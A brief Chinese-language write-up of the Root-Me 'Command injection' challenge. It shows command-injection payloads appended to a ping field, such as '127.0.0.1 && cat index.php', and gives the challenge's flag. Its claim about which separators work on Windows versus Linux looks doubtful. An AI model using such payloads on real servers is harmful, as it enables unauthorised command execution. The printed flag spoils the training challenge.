RootMe--Command injection
题目链接:https://www.root-me.org/en/Challenges/Web-Server/Command-injection
题目给了提示:
1. 命令注入 2. flag在index.php
打开题目后一个输入框,先输入127.0.0.1,发现是显示ping某个IP的网络状况。
尝试用连接符&& 查询下有哪些文件目录
127.0.0.1 && ls -al
发现了 index.php
构造payload查看index.php的内容
127.0.0.1 & cat index.php 127.0.0.1 && cat index.php 127.0.0.1 | cat index.php 127.0.0.1 , cat index.php 127.0.0.1 ; cat index.php
这5个在windows下都可以运行,不过Linux下连接符必须得用 &&,单个&不行
提交后出现了两个输入框
查看源码发现flag在里面
flag:S3rv1ceP1n9Sup3rS3cure